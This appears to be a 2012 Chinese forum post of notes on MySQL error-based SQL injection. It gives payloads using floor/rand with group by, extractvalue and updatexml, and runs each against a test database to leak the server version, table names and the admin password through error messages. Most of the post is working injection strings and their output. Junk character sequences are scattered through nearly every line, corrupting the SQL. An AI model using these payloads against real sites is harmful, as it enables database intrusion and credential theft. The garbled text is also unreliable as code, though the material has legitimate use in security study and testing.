放点原来的笔记,Mysql在执行语句的时候会抛出异常信息信息,而php+mysql架构的网站往往又将错误代码显示在页面上,这样可以通过构造如下三种方法获取特定数据。& k; [/ t; J# N- S
实际测试环境:
" n$ O% w7 n8 k
! J/ V! m/ G- W" D9 s. p ' S$ d' ]) U# S+ l& q' {3 Y2 d. \
mysql> show tables;
8 j- V4 e6 @ {3 p+----------------+2 f3 K/ E/ K2 W, o8 T+ w' N2 ^
| Tables_in_test |
) X( G8 b' N/ L$ w+----------------+
4 X5 g0 [1 ]1 |. C# B( k| admin | F: M ]% F/ B9 r4 I
| article |
" k! f C# w! I8 t3 m2 w6 Y( x+----------------+
8 ^" f0 b' l7 U B# P
0 Q0 s. v$ d+ F& W4 f
3 a. x9 B g/ S+ H& X. _ 3 W% G& G3 n1 u, k( K1 b
mysql> describe admin;! P$ X* a" X+ N6 a- h0 w
+-------+------------------+------+-----+---------+----------------+
$ D7 ~7 g" w$ U; \| Field | Type | Null | Key | Default | Extra |% \+ e' m6 M: b) D" \: C
+-------+------------------+------+-----+---------+----------------+4 t2 r) u; { E/ c! V
| id | int(10) unsigned | NO | PRI | NULL | auto_increment |7 D* N. ~/ X& |6 z0 z; i/ n% K
| user | varchar(50) | NO | | NULL | |# b9 W6 D( u9 A O' t5 F- F
| pass | varchar(50) | NO | | NULL | |5 D) v& h4 E* p
+-------+------------------+------+-----+---------+----------------+
. I, r3 Q% Y# K& a. b1 a 0 f0 y) u/ X# U. B
/ {& C% e3 ~9 y. x $ r% u: v3 L+ P# b$ |: ]3 z
mysql> describe article;
( [& b5 x( e8 X+---------+------------------+------+-----+---------+----------------+4 i' F/ X' u/ n. Z- ]
| Field | Type | Null | Key | Default | Extra |
$ \- n' f. [6 t+ A" b+---------+------------------+------+-----+---------+----------------+
- w% _' X1 `( n3 M2 I| id | int(10) unsigned | NO | PRI | NULL | auto_increment |
2 Y7 p j. B1 Y| title | varchar(50) | NO | | NULL | |
/ S/ g9 }0 f9 v, E v| content | varchar(50) | NO | | NULL | |
& d4 [: `1 P3 z, `* c+---------+------------------+------+-----+---------+----------------+ V3 Q/ X+ g" g6 S1 j0 W
1、通过floor报错! j( R8 Y) G) |( `/ q% e/ W
可以通过如下一些利用代码
/ A9 j' H9 w3 Q9 P$ q " n5 U/ H, ^# h) w: \: J" D/ P
; g. G& e( y5 V" ~( cand select 1 from (select count(*),concat(version(),floor(rand(0)*2))x
- ]4 l/ ^$ \7 V {9 @" T/ q8 Bfrom information_schema.tables group by x)a);3 t) L; g; P8 ?. x# t! L
) g. u b' s9 w2 {7 o$ H
0 p" y, V0 d) J4 Land (select count(*) from (select 1 union select null union select !1)x/ n8 z1 _# P0 c
group by concat((select table_name from information_schema.tables limit 1),$ H ^- P1 O1 w, w2 g
floor(rand(0)*2)));
7 a3 |! {! X: R" ^/ Y j举例如下:
2 e& ^ }+ F: S7 r首先进行正常查询:6 x) E* O2 ~% ^; }3 I
0 U+ w7 F% W- n, W/ j) B5 I2 Gmysql> select * from article where id = 1;
& H! H2 @8 Q2 T; E1 F) K' a+----+-------+---------+9 J% r" `" n$ v: y. s& |& A H+ N
| id | title | content |
+ i0 X# l1 ^) T+ ^0 e" n+----+-------+---------+
4 V% h. g* \! Q| 1 | test | do it |9 ^! o. U+ i! G; K& _2 x$ c
+----+-------+---------+2 B& b7 r% A- I7 `; }
假如id输入存在注入的话,可以通过如下语句进行报错。
* q5 a: a1 D( E9 b$ ~8 t 9 u, c! E+ V6 a: A
7 j) N8 k8 ^& ^* H3 v& N# k$ t
mysql> select * from article where id = 1 and (select 1 from; t1 o4 B9 o& @: Y% T, G0 }6 p2 [
(select count(*),concat(version(),floor(rand(0)*2))x from information_schema.tables group by x)a);
8 K8 K" m( Q( I9 v1 P8 {0 w8 @ERROR 1062 (23000): Duplicate entry '5.1.33-community-log1' for key 'group_key'
+ G6 _, ]3 ^9 b8 ]可以看到成功爆出了Mysql的版本,如果需要查询其他数据,可以通过修改version()所在位置语句进行查询。5 s2 o3 v7 V7 E6 g; D
例如我们需要查询管理员用户名和密码:
& ?) W& v- G0 R% t/ `Method1:
8 U$ U# k. ~+ H) c! e
/ M7 E- r" Z3 l8 h% c$ k+ T
: b0 ~ \1 O! Smysql> select * from article where id = 1 and (select 1 from
1 v4 [7 M! L/ F# U(select count(*),concat((select pass from admin where id =1),floor(rand(0)*2))x( e+ J z& h& j3 n
from information_schema.tables group by x)a);
3 w5 _7 ^- Y9 B- G% `/ O; fERROR 1062 (23000): Duplicate entry 'admin8881' for key 'group_key'
' Y+ H5 ?, R2 [/ sMethod2:$ r8 }; I) t2 J1 ~3 |/ `0 t
# H; Q1 p, i! l* U" g
; \% y) \3 U. K4 Wmysql> select * from article where id = 1 and (select count(*)! J6 H, H4 [6 S) z9 |) |: X* P- i
from (select 1 union select null union select !1)x group by concat((select pass from admin limit 1),+ G9 A8 Y! D& [8 p. x6 B( b& m
floor(rand(0)*2)));
/ r# T! ]2 h; m+ J; U8 n xERROR 1062 (23000): Duplicate entry 'admin8881' for key 'group_key'4 M% A, {5 G; A2 b, t# ~% v
2、ExtractValue
: S4 |; p9 w+ A' X( j& @测试语句如下; Z7 U6 b. Y, F/ @/ B i' Z. x
9 T5 B; j7 T% l4 V8 E3 J: ~7 U, J v ; m" P5 s5 g a) D
and extractvalue(1, concat(0x5c, (select table_name from information_schema.tables limit 1)));
" p9 |: w* T! O; f2 J实际测试过程5 D- G5 j9 k/ {! f& W
/ X. i- M% d8 o3 Z4 w4 ~5 `
" | K5 ]& |. c% p; {2 c2 X" s" Imysql> select * from article where id = 1 and extractvalue(1, concat(0x5c,
! S6 c7 d; S; b; S8 z6 q) v(select pass from admin limit 1)));--4 W* C) s4 e' r8 W# R7 M! {6 Y7 X
ERROR 1105 (HY000): XPATH syntax error: '\admin888'5 h0 ?- o( y" k" x& `- Q. P2 }- a# C
3、UpdateXml
; X1 y9 E. e& e$ m测试语句* f' {: P2 ^( C- Z, C
& J2 J1 S- d4 v, S1 }) A
% k! [) v. E8 ?# M4 ]" Iand 1=(updatexml(1,concat(0x5e24,(select user()),0x5e24),1))
* C$ H/ q& C% w# F! q9 h实际测试过程! c8 R+ B" j) I6 |; E$ m3 S+ a8 V
3 e: d) Y/ z$ v! M4 [; ]. C F) G" s; B
" V. z R! V/ m5 `* i, H/ o
mysql> select * from article where id = 1 and 1=(updatexml(1,concat(0x5e24," X1 C+ p7 t5 T6 ?- e( f# Q: s
(select pass from admin limit 1),0x5e24),1));
, ^1 | x/ r- S/ y. k5 ?9 c9 zERROR 1105 (HY000): XPATH syntax error: '^$admin888^$'! ^6 Y$ g5 @0 @8 C: i5 s9 d. e# B$ R
All, thanks foreign guys., J+ o8 w$ Z2 I5 i
5 Q9 j5 Q5 M; x( [. U
' P' E: l: Z) W2 T7 ?+ q |
发表于 2012-12-10 10:28:51
收藏
支持
反对